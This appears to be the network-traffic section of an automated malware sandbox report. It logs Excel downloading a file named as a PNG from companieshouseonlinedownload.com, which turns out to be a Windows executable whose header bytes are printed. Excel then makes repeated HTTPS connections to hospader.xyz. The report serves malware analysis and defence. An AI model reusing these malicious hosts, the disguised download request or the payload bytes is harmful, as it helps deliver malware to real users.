                        Dec 23, 2020 14:48:47.144730091 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.144750118 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.144773006 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.144778013 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.144825935 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.144840956 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.144865990 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.144893885 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.144913912 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.145219088 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.147406101 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.184542894 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184616089 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184696913 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184757948 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184818983 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184880972 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184880018 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.184911966 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.184916973 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.184921026 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.184940100 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.184958935 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.185014963 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.188296080 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.188355923 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.188405991 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.188457966 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.188471079 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.188499928 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.188504934 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.188507080 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:48:47.188544989 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.188581944 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.189377069 CET4916780192.168.2.2247.254.169.221
                        Dec 23, 2020 14:48:47.232837915 CET804916747.254.169.221192.168.2.22
                        Dec 23, 2020 14:51:11.619203091 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.619288921 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.698158979 CET4434916845.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.698184013 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.698344946 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.702284098 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.716420889 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.720714092 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.795309067 CET4434916845.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.803211927 CET4434916845.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.803244114 CET4434916845.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.803263903 CET4434916845.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.803333998 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.803384066 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.821919918 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.829519987 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.829549074 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.829569101 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.829652071 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.829663038 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.847177029 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.869420052 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.957279921 CET4434916845.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.957482100 CET49168443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:11.967539072 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:11.967756033 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:13.556355953 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:13.556457043 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:13.643407106 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:15.188946009 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:15.188982964 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:15.189117908 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:15.406456947 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:15.533328056 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:16.729398966 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:16.729584932 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:17.801296949 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:17.900187016 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:17.900330067 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:17.923851967 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:18.005640984 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:18.012948990 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:18.012993097 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:18.013016939 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:18.013183117 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:18.064287901 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:18.149028063 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:18.149185896 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:18.382929087 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:18.505286932 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974131107 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974176884 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974226952 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974268913 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974306107 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974317074 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974344015 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974363089 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974369049 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974374056 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974383116 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974411011 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974421024 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974433899 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974459887 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974466085 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974499941 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:19.974526882 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.974548101 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:19.975179911 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.053417921 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.053489923 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.053507090 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.053523064 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.053558111 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.053565025 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175623894 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175657034 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175687075 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175704956 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175715923 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175734043 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175738096 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175751925 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175765038 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175786018 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175801039 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175815105 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175836086 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175853014 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175865889 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175879955 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175887108 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175903082 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175920010 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175935984 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175962925 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.175976038 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.175987959 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.176008940 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.176013947 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.176048040 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318579912 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318623066 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318655014 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318655968 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318682909 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318695068 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318701029 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318713903 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318725109 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318742990 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318769932 CET4434917645.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:20.318770885 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318805933 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.318816900 CET49176443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:20.957462072 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:21.036747932 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774370909 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774439096 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774457932 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774486065 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774524927 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774550915 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774565935 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774578094 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774610043 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774621010 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774651051 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774666071 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774691105 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774708033 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774732113 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774740934 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774781942 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.774785042 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.774835110 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.858131886 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.858187914 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.858220100 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.858258963 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.858592987 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.957895041 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.957953930 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.957993031 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958029985 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958059072 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958069086 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958086014 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958090067 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958106995 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958154917 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958161116 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958197117 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958204985 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958235979 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958250999 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958276033 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958281994 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958313942 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958319902 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958350897 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958359003 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958384037 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:22.958396912 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:22.958435059 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271229029 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271289110 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271331072 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271368980 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271405935 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271444082 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271459103 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271481991 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271533966 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271576881 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271615982 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271634102 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271655083 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271671057 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271686077 CET4434916945.142.212.128192.168.2.22
                        Dec 23, 2020 14:51:23.271706104 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271800995 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271815062 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271822929 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271833897 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271867037 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271883011 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:23.271981001 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:24.121870041 CET49169443192.168.2.2245.142.212.128
                        Dec 23, 2020 14:51:24.201075077 CET4434916945.142.212.128192.168.2.22

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 23, 2020 14:48:46.480801105 CET5219753192.168.2.228.8.8.8
                        Dec 23, 2020 14:48:46.849703074 CET53521978.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:08.523283958 CET5309953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:08.581275940 CET53530998.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:09.530358076 CET5283853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:10.534378052 CET5283853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:11.548245907 CET5283853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:11.606201887 CET53528388.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.286729097 CET6120053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.288408041 CET4954853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.335350037 CET53612008.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.344763041 CET53495488.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.348845959 CET5562753192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.370590925 CET5600953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.396727085 CET53556278.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.418514967 CET53560098.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:12.945821047 CET6186553192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:12.993933916 CET53618658.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.007906914 CET5517153192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.035908937 CET5249653192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.058830976 CET53551718.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.059700966 CET5756453192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.060652971 CET6300953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.062037945 CET5931953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.063117027 CET5307053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.063638926 CET5977053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.064218998 CET6152353192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.093909979 CET53524968.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.108515978 CET53630098.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.110019922 CET6279153192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:13.110872984 CET53530708.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.111362934 CET53597708.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.112637997 CET53593198.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.115793943 CET53575648.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.129065990 CET53615238.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:13.157793999 CET53627918.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:14.441529036 CET5066753192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:14.492243052 CET53506678.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:17.297760010 CET5412953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:17.354085922 CET53541298.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.851003885 CET6532953192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.851068974 CET6071853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.851372957 CET4915753192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.851943016 CET5739153192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.852509022 CET6185853192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.853055954 CET6250053192.168.2.228.8.8.8
                        Dec 23, 2020 14:51:20.898948908 CET53653298.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.898987055 CET53607188.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.899008989 CET53491578.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.899565935 CET53573918.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.900171041 CET53618588.8.8.8192.168.2.22
                        Dec 23, 2020 14:51:20.900824070 CET53625008.8.8.8192.168.2.22

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Dec 23, 2020 14:48:46.480801105 CET192.168.2.228.8.8.80xed69Standard query (0)companieshouseonlinedownload.comA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:09.530358076 CET192.168.2.228.8.8.80x8c47Standard query (0)hospader.xyzA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:10.534378052 CET192.168.2.228.8.8.80x8c47Standard query (0)hospader.xyzA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:11.548245907 CET192.168.2.228.8.8.80x8c47Standard query (0)hospader.xyzA (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:17.297760010 CET192.168.2.228.8.8.80xdfe8Standard query (0)hospader.xyzA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Dec 23, 2020 14:48:46.849703074 CET8.8.8.8192.168.2.220xed69No error (0)companieshouseonlinedownload.com47.254.169.221A (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:11.606201887 CET8.8.8.8192.168.2.220x8c47No error (0)hospader.xyz45.142.212.128A (IP address)IN (0x0001)
                        Dec 23, 2020 14:51:17.354085922 CET8.8.8.8192.168.2.220xdfe8No error (0)hospader.xyz45.142.212.128A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • companieshouseonlinedownload.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.224916747.254.169.22180C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        TimestampkBytes transferredDirectionData
                        Dec 23, 2020 14:48:46.905663967 CET0OUTGET /ox9.png HTTP/1.1
                        Accept: */*
                        UA-CPU: AMD64
                        Accept-Encoding: gzip, deflate
                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                        Host: companieshouseonlinedownload.com
                        Connection: Keep-Alive
                        Dec 23, 2020 14:48:46.964911938 CET2INHTTP/1.1 200 OK
                        Date: Wed, 23 Dec 2020 13:48:46 GMT
                        Server: Apache/2.4.25 (Debian)
                        Last-Modified: Tue, 22 Dec 2020 12:15:21 GMT
                        ETag: "3a400-5b70c874cc840"
                        Accept-Ranges: bytes
                        Content-Length: 238592
                        Connection: close
                        Content-Type: image/png
                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 